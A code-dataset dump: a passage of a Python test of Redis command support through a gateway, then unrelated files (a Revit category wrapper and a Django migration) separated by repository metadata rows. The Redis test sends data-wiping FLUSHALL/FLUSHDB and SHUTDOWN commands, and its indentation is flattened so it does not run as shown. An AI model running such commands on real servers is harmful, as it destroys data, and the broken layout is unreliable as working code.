# | BGREWRITEAOF | X | |
resp = r('BGREWRITEAOF')
assert(resp.startswith('ERR Unsupported'))
# | BGSAVE | X | |
resp = r('BGSAVE')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('Background'))
# | BITCOUNT | O | |
r('set', key, 'foobar')
resp = r('BITCOUNT', key)
assert(resp == 26)
# | BITFIELD | O | Available since 1.4 |
r('del', key)
resp = r('BITFIELD', key, 'incrby', 'i5', 100, 1, 'get', 'u4', 0)
assert(resp == [1,0])
# | BITOP | X | |
r('set', key, 'foobar')
r('set', key2, 'abcdef')
resp = r('BITOP', 'AND', dest, key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 6)
# | BITPOS | O | |
r('set', key, '\xff\xf0\x00')
resp = r('BITPOS', key, 0)
assert(resp == 12)
# | BLPOP | X | |
resp = r('BLPOP', key, 0)
assert(resp.startswith('ERR Unsupported'))
# | BRPOP | X | |
resp = r('BRPOP', key, 0)
assert(resp.startswith('ERR Unsupported'))
# | BRPOPLPUSH | X | |
resp = r('BRPOPLPUSH', key, dest, 0)
assert(resp.startswith('ERR Unsupported'))
# | CLIENT | X | |
resp = r('CLIENT', 'LIST')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('id='))
# | CLUSTER | X | |
resp = r('CLUSTER', 'info')
assert(resp.startswith('ERR Unsupported'))
# | COMMAND | X | |
resp = r('COMMAND')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) > 0)
# | CONFIG | X | |
resp = r('CONFIG', 'get', 'save')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2) # ['save', '']
# | CRC16 | O | |
r('del', key)
resp = r('CRC16', key, 'abcd')
assert(resp == 43062)
# | DBSIZE | O | returns aggregated dbsize |
r('set', key, '1')
resp = r('DBSIZE')
assert(resp >= 1)
# | DEBUG | X | |
if GW:
resp = r('DEBUG', 'object', key)
assert(resp.startswith('ERR Unsupported'))
else:
pass # integration test use 'debug'
# | DECR | O | |
r('set', key, 10)
resp = r('DECR', key)
assert(resp == 9)
# | DECRBY | O | |
r('set', key, 10)
resp = r('DECRBY', key, 2)
assert(resp == 8)
# | DEL | O | |
r('set', key, 'babe')
r('DEL', key)
resp = r('exists', key)
assert(resp == 0)
# | DISCARD | X | |
resp = r('DISCARD')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR DISCARD'))
# | DUMP | O | |
r('set', key, 1)
dump = r('DUMP', key)
resp = r('del', key)
assert(resp == 1)
r('restore', key, 0, dump)
resp = r('get', key)
assert(resp == '1')
# | ECHO | X | |
resp = r('ECHO', 'hihi')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'hihi')
# | EVAL | X | |
resp = r('EVAL', 'return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}', 2, key, key2, 'first', 'second')
assert(resp.startswith('ERR Unsupported'))
# | EVALSHA | X | |
resp = r('EVALSHA', 'fd758d1589d044dd850a6f05d52f2eefd27f033f', 1, key)
assert(resp.startswith('ERR Unsupported'))
# | EXEC | X | |
resp = r('EXEC')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR EXEC'))
# | EXISTS | O | |
r('del', key)
r('set', key, 1)
resp = r('EXISTS', key)
assert(resp == 1)
# | EXPIRE | O | |
r('set', key, 1)
resp = r('EXPIRE', key, 1)
assert(resp == 1)
# | EXPIREAT | O | |
r('set', key, 1)
resp = r('EXPIREAT', key, 1293840000)
assert(resp == 1)
# | FLUSHALL | X | |
resp = r('FLUSHALL')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('OK'))
# | FLUSHDB | X | |
resp = r('FLUSHDB')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('OK'))
# | GEOADD | O | Available since 1.4 |
# | GEODIST | O | Available since 1.4 |
# | GEOHASH | O | Available since 1.4 |
# | GEOPOS | O | Available since 1.4 |
# | GEORADIUS | O | Available since 1.4 (no store option) |
# | GEORADIUSBYMEMBER | O | Available since 1.4 (no store option) |
r('del', key)
resp = r('GEOADD', key, 13.361389, 38.115556, 'Palermo', 15.087269, 37.502669, 'Catania')
assert(resp == 2)
resp = r('GEODIST', key, 'Palermo', 'Catania')
        assert(float(resp) > 166274 and float(resp) < 166275) # ~166274.15 m
resp = r('GEOHASH', key, 'Palermo', 'Catania')
assert(len(resp) == 2)
resp = r('GEOPOS', key, 'Palermo', 'Catania', 'NonExisting')
assert(len(resp) == 3)
resp = r('GEORADIUS', key, 15, 37, 200, 'km', 'WITHDIST')
assert(len(resp) == 2)
resp = r('GEORADIUS', key, 15, 37, 200, 'km', 'WITHDIST', 'STORE', key2)
assert(resp.startswith('ERR STORE'))
resp = r('GEORADIUSBYMEMBER', key, 'Palermo', 1000, 'km')
assert(len(resp) == 2)
resp = r('GEORADIUSBYMEMBER', key, 'Palermo', 200, 'km', 'STORE', key2)
assert(resp.startswith('ERR STORE'))
# | GET | O | |
r('set', key, 'gg')
resp = r('GET', key)
assert(resp == 'gg')
# | GETBIT | O | |
r('setbit', key, 7, 1)
resp = r('GETBIT', key, 7)
assert(resp == 1)
# | GETRANGE | O | |
r('set', key, "This is a string")
resp = r('GETRANGE', key, 0, 3)
assert(resp == "This")
# | GETSET | O | |
r('set', key, 'oldval')
resp = r('GETSET', key, 'newval')
assert(resp == 'oldval')
# | HDEL | O | |
# | HEXISTS | O | |
# | HGET | O | |
# | HGETALL | O | |
# | HINCRBY | O | |
# | HINCRBYFLOAT | O | |
# | HKEYS | O | |
# | HLEN | O | |
# | HMGET | O | |
# | HMSET | O | |
r('del', key)
resp = r('HSET', key, 'k1', 'v1')
assert(resp == 1)
resp = r('HGET', key, 'k1')
assert(resp == 'v1')
resp = r('HGETALL', key)
assert(len(resp) == 2)
resp = r('HEXISTS', key, 'kkk')
assert(resp == 0)
r('hset', key, 'count', 100)
resp = r('HINCRBY', key, 'count', 2)
assert(resp == 102)
resp = r('HINCRBYFLOAT', key, 'count', 2.0)
assert(float(resp) == 104.0)
resp = r('HKEYS', key)
assert(len(resp) == 2)
resp = r('HLEN', key)
assert(resp == 2)
resp = r('HMGET', key, 'k1', 'k2')
assert(len(resp) == 2)
resp = r('HMSET', key, 'kk1', 'vv1', 'kk2', 'vv2')
assert(resp == 'OK')
# | HOST: | X | |
# skip
# | HSCAN | O | Available since 1.4 |
# | HSET | O | |
# | HSETNX | O | |
# | HSTRLEN | O | Available since 1.4 |
# | HVALS | O | |
r('del', key)
resp = r('HSET', key, 'k1', 'v11')
assert(resp == 1)
resp = r('HSCAN', key, 0)
assert(len(resp) == 2)
resp = r('HSETNX', key, 'k1', 'v2')
assert(resp == 0)
resp = r('HSTRLEN', key, 'k1')
assert(resp == 3)
resp = r('HVALS', key)
assert(len(resp) == 1)
# | INCR | O | |
# | INCRBY | O | |
# | INCRBYFLOAT | O | |
r('set', key, 100)
resp = r('INCR', key)
assert(resp == 101)
resp = r('INCRBY', key, 1000)
assert(resp == 1101)
resp = r('INCRBYFLOAT', key, 0.12)
assert(float(resp) == 1101.12)
# | INFO | O | returns cluster info |
resp = r('INFO')
assert(len(resp) > 500)
# | KEYS | X | |
resp = r('KEYS', 'nosuchkey_may_be.really.ok???')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 0)
# | LASTSAVE | X | |
resp = r('LASTSAVE')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp > 1500000000)
# | LATENCY | X | |
resp = r('LATENCY')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp.startswith('ERR wrong number'))
# | LINDEX | O | |
# | LINSERT | O | |
# | LLEN | O | |
# | LPOP | O | |
# | LPUSH | O | |
# | LPUSHX | O | |
# | LRANGE | O | |
# | LREM | O | |
# | LSET | O | |
# | LTRIM | O | |
r('del', key)
resp = r('LPUSH', key, 'v2')
assert(resp == 1)
resp = r('LPUSHX', key, 'v1')
assert(resp == 2)
resp = r('LINDEX', key, 1)
assert(resp == 'v2')
resp = r('LINSERT', key, 'BEFORE', 'v2', 'mid')
assert(resp == 3)
resp = r('LLEN', key)
assert(resp == 3)
resp = r('LRANGE', key, 0, 0)
assert(len(resp) == 1 and resp[0] == 'v1')
resp = r('LREM', key, 0, 'v1')
assert(resp == 1)
resp = r('LSET', key, 1, 'MID')
assert(resp == 'OK')
resp = r('LTRIM', key, 1, -1)
assert(resp == 'OK')
resp = r('LPOP', key)
assert(resp == 'MID')
# | MGET | O | |
r('set', key, 1)
r('set', key2, 2)
resp = r('MGET', key, key2)
assert(len(resp) == 2)
# | MIGRATE | X | |
resp = r('MIGRATE', 'localhost', '7009', key)
assert(resp.startswith('ERR Unsupported'))
# | MONITOR | X | |
# skip
# | MOVE | X | |
resp = r('MOVE', key, 1)
assert(resp.startswith('ERR Unsupported'))
# | MSET | O | |
resp = r('MSET', key, 1, key2, 2)
assert(resp == 'OK')
# | MSETNX | X | |
r('del', key)
r('del', key2)
resp = r('MSETNX', key, 1, key2, 2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1) # all keys are set
# | MULTI | X | |
resp = r('MULTI')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
resp = r('discard')
assert(resp == 'OK')
# | OBJECT | O | |
r('set', key, 'this is test expected to be uni..dque')
resp = r('OBJECT', 'REFCOUNT', key)
assert(resp == 1)
# | PERSIST | O | |
r('set', key, 100)
resp = r('PERSIST', key)
assert(resp == 0) # has no associated ttl
# | PEXPIRE | O | |
r('set', key, 100)
resp = r('PEXPIRE', key, 10000)
assert(resp == 1)
# | PEXPIREAT | O | |
r('set', key, 200)
resp = r('PEXPIREAT', key, 1000000)
assert(resp == 1)
# | PFADD | O | Available since 1.4 |
# | PFCOUNT | O | Available since 1.4 (single key only) |
r('del', key)
resp = r('PFADD', key, 1, 2, 3, 4, 5, 6)
assert (resp == 1)
resp = r('PFCOUNT', key)
assert (resp == 6)
# | PFDEBUG | X | |
resp = r('PFDEBUG', key)
assert(resp.startswith('ERR Unsupported'))
# | PFMERGE | X | |
r('del', key)
r('del', key2)
        r('pfadd', key, 1, 2, 3, 4, 5)
resp = r('PFMERGE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | PFSELFTEST | X | |
resp = r('PFSELFTEST', 'xbac') # bad arg for purpose
assert(resp.startswith('ERR Unsupported'))
# | PING | O | gateway ping |
resp = r('PING')
assert(resp == 'PONG')
# | POST | X | |
# skip
# | PSETEX | O | |
r('del', key)
resp = r('PSETEX', key, 10000, 'val')
assert(resp == 'OK')
# | PSUBSCRIBE | X | |
resp = r('PSUBSCRIBE', 'h?llo')
assert(resp.startswith('ERR Unsupported'))
# | PSYNC | X | |
resp = r('PSYNC', 'runid', 1000)
assert(resp.startswith('ERR Unsupported'))
# | PTTL | O | |
r('set', key, 1)
resp = r('PTTL', key)
assert(resp == -1)
# | PUBLISH | X | |
resp = r('PUBLISH', 'chan', 'message')
assert(resp.startswith('ERR Unsupported'))
# | PUBSUB | X | |
resp = r('PUBSUB', 'CHANNELS')
assert(resp.startswith('ERR Unsupported'))
# | PUNSUBSCRIBE | X | |
resp = r('PUNSUBSCRIBE')
assert(resp.startswith('ERR Unsupported'))
# | QUIT | O | |
# skip
# | RANDOMKEY | X | |
r('set', key, 100)
resp = r('RANDOMKEY')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) > 0)
# | READONLY | X | |
resp = r('READONLY')
assert(resp.startswith('ERR Unsupported'))
# | READWRITE | X | |
resp = r('READWRITE')
assert(resp.startswith('ERR Unsupported'))
# | RENAME | X | |
r('set', key, 1)
r('del', key2)
resp = r('RENAME', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | RENAMENX | X | |
r('set', key, 1)
r('del', key2)
resp = r('RENAMENX', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1)
# | REPLCONF | X | |
resp = r('REPLCONF', 'option', 'value')
assert(resp.startswith('ERR Unsupported'))
# | RESTORE | O | |
r('del', key)
resp = r('RESTORE', key, 0, '\n\x17\x17\x00\x00\x00\x12\x00\x00\x00\x03\x00\x00\xc0\x01\x00\x04\xc0\x02\x00\x04\xc0\x03\x00\xff\x04\x00u#<\xc0;.\xe9\xdd')
assert(resp == 'OK')
resp = r('type', key)
assert(resp == 'list')
# | RESTORE-ASKING | X | |
r('del', key)
resp = r('RESTORE-ASKING', key, 0, '\n\x17\x17\x00\x00\x00\x12\x00\x00\x00\x03\x00\x00\xc0\x01\x00\x04\xc0\x02\x00\x04\xc0\x03\x00\xff\x04\x00u#<\xc0;.\xe9\xdd')
assert(resp.startswith('ERR Unsupported'))
# | ROLE | X | |
resp = r('ROLE')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 3)
# | RPOP | O | |
r('del', key)
r('rpush', key, 'v1')
r('rpush', key, 'v2')
resp = r('RPOP', key)
assert(resp == 'v2')
# | RPOPLPUSH | X | |
r('del', key)
r('del', key2)
resp = r('RPOPLPUSH', key, key2)
if GW:
assert (resp.startswith('ERR Unsupported'))
else:
assert (resp == None)
# | RPUSH | O | |
r('del', key)
resp = r('RPUSH', key, 'v')
assert(resp == 1)
# | RPUSHX | O | |
r('del', key)
r('rpush', key, 'v1')
resp = r('RPUSHX', key, 'v2')
assert(resp == 2)
# | SADD | O | |
r('del', key)
resp = r('SADD', key, 'v1')
assert(resp == 1)
# | SAVE | X | |
resp = r('SAVE')
assert(resp.startswith('ERR Unsupported'))
# | SCAN | O | Available since 1.4 |
resp = r('SCAN', 0)
assert(len(resp) == 2)
# | SCARD | O | |
r('del', key)
r('sadd', key, 'v')
resp = r('SCARD', key)
assert(resp == 1)
# | SCRIPT | X | |
resp = r('SCRIPT', 'exists')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 0)
# | SDIFF | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'c', 'd')
resp = r('SDIFF', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2)
# | SDIFFSTORE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'c', 'd')
resp = r('SDIFFSTORE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 3)
# | SELECT | X | |
resp = r('SELECT', 0)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | SET | O | |
resp = r('SET', key, 100)
assert(resp == 'OK')
# | SETBIT | O | |
r('set', key, 7)
resp = r('SETBIT', key, 3, 0)
assert(resp == 1)
# | SETEX | O | |
resp = r('SETEX', key, 10, "hello")
assert(resp == 'OK')
# | SETNX | O | |
r('del', key)
resp = r('SETNX', key, 100)
assert(resp == 1)
# | SETRANGE | O | |
r('set', key, 'Hello World')
resp = r('SETRANGE', key, 6, 'Redis')
assert(resp == 11)
# | SHUTDOWN | X | |
resp = r('SHUTDOWN')
assert(resp.startswith('ERR Unsupported'))
# | SINTER | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'b', 'c')
resp = r('SINTER', key, key2)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2)
# | SINTERSTORE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
resp = r('SINTERSTORE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 3)
# | SISMEMBER | O | |
r('del', key)
r('sadd', key, 'a', 'b', 'c')
resp = r('SISMEMBER',key, 'c')
assert(resp == 1)
# | SLAVEOF | X | |
resp = r('SLAVEOF', 'localhost', 1234)
assert(resp.startswith('ERR Unsupported'))
# | SLOWLOG | X | |
resp = r('SLOWLOG', 'get', 1)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(not str(resp).startswith('ERR'))
# | SMEMBERS | O | |
r('del', key)
r('sadd', key, 'a', 'b', 'c')
resp = r('SMEMBERS', key)
assert(len(resp) == 3)
# | SMOVE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
r('sadd', key2, 'b', 'c')
resp = r('SMOVE', key, key2, 'a')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1)
# | SORT | X | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SORT', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 3 and resp[0] == '8')
# | SPOP | X | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SPOP', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == '10' or resp == '9' or resp == '8')
# | SRANDMEMBER | O | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SRANDMEMBER', key)
assert(resp == '10' or resp == '9' or resp == '8')
# | SREM | O | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SREM', key, 10, 9)
assert(resp == 2)
# | SSCAN | O | Available since 1.4 |
r('del', key)
r('sadd', key, 10)
resp = r('SSCAN', key, 0)
assert(len(resp) == 2)
# | STRLEN | O | |
r('set', key, '01234')
resp = r('STRLEN', key)
assert(resp == 5)
# | SUBSCRIBE | X | |
resp = r('SUBSCRIBE', 'channel')
assert(resp.startswith('ERR Unsupported'))
# | SUBSTR | O | |
r('set', key, "This is a string")
resp = r('SUBSTR', key, 0, 3)
assert(resp == "This")
# | SUNION | X | |
r('del', key)
r('sadd', key, 'a', 'b', 'c')
resp = r('SUNION', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 3)
# | SUNIONSTORE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
resp = r('SUNIONSTORE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 3)
# | SYNC | X | |
resp = r('SYNC')
assert(resp.startswith('ERR Unsupported'))
# | TIME | X | |
resp = r('TIME')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2)
# | TOUCH | O | Available since 1.4 (multi key) |
r('del', key)
r('del', key2)
resp = r('TOUCH', key, key2)
assert(resp == 0)
# | TTL | O | |
r('set', key, 100)
resp = r('TTL', key)
assert(resp == -1)
# | TYPE | O | |
r('set', key, 100)
resp = r('TYPE', key)
assert(resp == 'string')
# | UNSUBSCRIBE | X | |
resp = r('UNSUBSCRIBE')
assert(resp.startswith('ERR Unsupported'))
# | UNWATCH | X | |
# | WATCH | X | |
resp = r('WATCH', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
resp = r('UNWATCH')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | WAIT | X | |
resp = r('WAIT', 1, 10000)
assert(resp.startswith('ERR Unsupported'))
# | ZADD | O | |
# | ZCARD | O | |
# | ZCOUNT | O | |
# | ZINCRBY | O | |
# | ZINTERSTORE | X | |
# | ZLEXCOUNT | O | Available since 1.4 |
# | ZRANGE | O | |
# | ZRANGEBYLEX | O | Available since 1.4 |
# | ZRANGEBYSCORE | O | |
# | ZRANK | O | |
# | ZREM | O | |
# | ZREMRANGEBYLEX | O | Available since 1.4 |
# | ZREMRANGEBYRANK | O | |
# | ZREMRANGEBYSCORE | O | |
# | ZREVRANGE | O | |
# | ZREVRANGEBYLEX | O | Available since 1.4 |
# | ZREVRANGEBYSCORE | O | |
# | ZREVRANK | O | |
# | ZSCAN | O | Available since 1.4 |
# | ZSCORE | O | |
# | ZUNIONSTORE | X | |
r('del', key)
resp = r('ZADD', key, 1.0, 'v1')
assert(resp == 1)
resp = r('ZCARD', key)
assert(resp == 1)
resp = r('ZCOUNT', key, 0.9, 1.1)
assert(resp == 1)
resp = r('ZINCRBY', key, 1.0, 'v1')
assert(float(resp) == 2.0)
resp = r('ZINTERSTORE', dest, 1, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1)
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZLEXCOUNT', key, '-', '+')
assert(resp == 7)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZRANGE', key, 0, -1)
assert(len(resp) == 3)
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZRANGEBYLEX', key, '-', '[c')
assert(len(resp) == 3)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZRANGEBYSCORE', key, 1, 2)
assert(len(resp) == 2)
resp = r('ZRANK', key, "one")
assert(resp == 1)
resp = r('ZREM', key, "two")
assert(resp == 1)
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZREMRANGEBYLEX', key, '[a', '[e')
assert(resp == 5)
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZREMRANGEBYRANK', key, 0, 1)
assert(resp == 2)
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZREMRANGEBYSCORE', key, 0, 3)
assert(resp == 4)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZREVRANGE', key, 0, -1)
assert(len(resp) == 3 and resp[0] == 'two')
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZREVRANGEBYLEX', key, '[c', '-')
assert(len(resp) == 3)
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZREVRANGEBYSCORE', key, '(3', '(0')
assert(len(resp) == 2)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZREVRANK', key, "zero")
assert(resp == 2)
r('del', key)
r('zadd', key, 0, "zero")
resp = r('ZSCAN', key, 0)
assert(len(resp) == 2 and resp[0] == '0')
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZSCORE', key, 'c')
assert(float(resp) == 2)
r('del', key)
r('del', key2)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZUNIONSTORE', key2, 1, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 7)
finally:
r('del', key)
r('del', key2)
r('del', dest)
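# ---------------------------------------------------------------------------
# Editor's note: the checks above call an `r(...)` helper and read a `GW`
# (gateway) flag that are defined earlier in this test file. The function
# below is a hypothetical, minimal sketch of such a helper (not the original
# implementation), built on the `redis` Python package: it forwards a raw
# command and returns the server's error text as a string instead of raising,
# so string-prefix assertions like `resp.startswith('ERR Unsupported')` can be
# written. The host/port and the error formatting are assumptions.
import redis as _redis_sketch

_sketch_client = _redis_sketch.StrictRedis(host='localhost', port=6379,
                                           decode_responses=True)

def _r_sketch(*args):
    """Send a raw command; return the reply, or the error message on failure."""
    try:
        return _sketch_client.execute_command(*args)
    except _redis_sketch.ResponseError as exc:
        msg = str(exc)
        # redis-py may strip the leading error code from the reply, so restore
        # a generic one; the original helper may format errors differently.
        return msg if msg.startswith('ERR') else 'ERR ' + msg
# ---------------------------------------------------------------------------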
| 30.58125
| 169
| 0.397984
|
091e78817c792a7d74c2410030bd27fd1ebc944e
| 2,703
|
py
|
Python
|
rpw/db/category.py
|
gtalarico/revitpythonwrapper
|
50d96adf31f164ec8eb2f04e4bbc13f7a1c64d42
|
[
"MIT"
] | 105
|
2016-11-16T02:29:49.000Z
|
2021-11-29T15:07:05.000Z
|
rpw/db/category.py
|
gtalarico/revitpythonwrapper
|
50d96adf31f164ec8eb2f04e4bbc13f7a1c64d42
|
[
"MIT"
] | 43
|
2016-12-02T15:18:21.000Z
|
2020-10-20T01:03:36.000Z
|
rpw/db/category.py
|
gtalarico/revitpythonwrapper
|
50d96adf31f164ec8eb2f04e4bbc13f7a1c64d42
|
[
"MIT"
] | 41
|
2016-12-16T22:11:23.000Z
|
2022-02-03T17:43:24.000Z
|
"""
Category Wrapper
""" #
import rpw
from rpw import revit, DB
from rpw.db.element import Element
from rpw.base import BaseObjectWrapper
from rpw.utils.logger import logger, deprecate_warning
from rpw.db.builtins import BicEnum
class Category(BaseObjectWrapper):
"""
`DB.Category` Wrapper
Attribute:
_revit_object (DB.Family): Wrapped ``DB.Category``
"""
_revit_object_class = DB.Category
@property
def name(self):
""" Returns name of the Category """
return self._revit_object.Name
def get_families(self, wrapped=True, doc=None):
"""
Returns:
Families (``DB.Family``): List of Family elements in this
same category
"""
# There has to be a better way, but perhaps not: https://goo.gl/MqdzWg
unique_family_ids = set()
for symbol in self.get_symbols(wrapped=True):
unique_family_ids.add(symbol.family.Id)
doc = doc or revit.doc
elements = [doc.GetElement(family_id) for family_id in unique_family_ids]
return [Element(e) for e in elements] if wrapped else elements
@property
def families(self):
deprecate_warning('Category.families',
                          'Category.get_families(wrapped=True)')
return self.get_families(wrapped=True)
def get_symbols(self, wrapped=True):
"""
Returns:
Symbols (``DB.FamilySymbol``): List of Symbol Types in the Category
"""
collector = rpw.db.Collector(of_category=self.builtin, is_type=True)
return collector.get_elements(wrapped)
@property
def symbols(self):
deprecate_warning('Category.symbols',
                          'Category.get_symbols(wrapped=True)')
return self.get_symbols(wrapped=True)
def get_instances(self, wrapped=True):
"""
Returns:
(``DB.FamilyInstance``): List of Symbol Instances in the Category.
"""
collector = rpw.db.Collector(of_category=self.builtin, is_not_type=True)
return collector.get_elements(wrapped)
@property
def instances(self):
deprecate_warning('Category.instances',
                          'Category.get_instances(wrapped=True)')
return self.get_instances(wrapped=True)
@property
def builtin(self):
""" Returns BuiltInCategory of the Category """
return BicEnum.from_category_id(self._revit_object.Id)
@property
def _builtin_enum(self):
deprecate_warning('Category._builtin_enum()', 'Category.builtin')
return self.builtin
def __repr__(self):
return super(Category, self).__repr__({'name': self.name})
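# ---------------------------------------------------------------------------
# Editor's note: a hypothetical usage sketch for the wrapper above, not part
# of the original module. It assumes the code runs inside a Revit Python
# environment (pyRevit / RevitPythonShell) where ``rpw.revit.doc`` points at
# an open document, and that the Walls category exists in that document.
def _category_usage_sketch():
    walls_db_cat = revit.doc.Settings.Categories.get_Item(DB.BuiltInCategory.OST_Walls)
    walls = Category(walls_db_cat)
    name = walls.name                                    # e.g. 'Walls'
    builtin = walls.builtin                              # DB.BuiltInCategory.OST_Walls
    wall_types = walls.get_symbols(wrapped=True)         # wrapped type elements
    wall_instances = walls.get_instances(wrapped=False)  # unwrapped DB elements
    return name, builtin, wall_types, wall_instances
# ---------------------------------------------------------------------------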
| 30.033333
| 81
| 0.63744
|
a1b96bf28dc4b9a560b80d6ef5bc012b7c533e11
| 1,737
|
py
|
Python
|
examWeb/examWeb/web/migrations/0001_initial.py
|
bvoytash/Software-University
|
f2c6940cde093cea7b1c38bd88305206564c9947
|
[
"MIT"
] | null | null | null |
examWeb/examWeb/web/migrations/0001_initial.py
|
bvoytash/Software-University
|
f2c6940cde093cea7b1c38bd88305206564c9947
|
[
"MIT"
] | null | null | null |
examWeb/examWeb/web/migrations/0001_initial.py
|
bvoytash/Software-University
|
f2c6940cde093cea7b1c38bd88305206564c9947
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.2 on 2022-02-27 08:23
import django.core.validators
from django.db import migrations, models
import examWeb.web.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('album_name', models.CharField(max_length=30, unique=True)),
('artist', models.CharField(max_length=30)),
('genre', models.CharField(choices=[('Pop Music', 'Pop Music'), ('Jazz Music', 'Jazz Music'), ('R&B Music', 'R&B Music'), ('Rock Music', 'Rock Music'), ('Country Music', 'Country Music'), ('Dance Music', 'Dance Music'), ('Hip Hop Music', 'Hip Hop Music'), ('Other', 'Other')], max_length=30)),
('description', models.TextField(blank=True, null=True)),
('image_url', models.URLField()),
('price', models.FloatField(validators=[django.core.validators.MinValueValidator(0.0)])),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=15, validators=[django.core.validators.MinLengthValidator(2), examWeb.web.models.validate_username])),
('email', models.EmailField(max_length=254)),
('age', models.IntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(0)])),
],
),
]
| 45.710526
| 309
| 0.603339
|
f19e8f19348a304e5c3f814124379ecd99564202
| 18,575
|
py
|
Python
|
kinect_smoothing/trajectory_smoothing.py
|
ostadabbas/HW-HuP
|
0a7b4263f72e7ff7f9bc4c81366569822c3ee248
|
[
"MIT"
] | 47
|
2019-07-11T23:37:27.000Z
|
2022-03-07T09:52:24.000Z
|
kinect_smoothing/trajectory_smoothing.py
|
ostadabbas/HW-HuP
|
0a7b4263f72e7ff7f9bc4c81366569822c3ee248
|
[
"MIT"
] | 6
|
2019-09-23T15:57:38.000Z
|
2022-03-30T08:17:40.000Z
|
kinect_smoothing/trajectory_smoothing.py
|
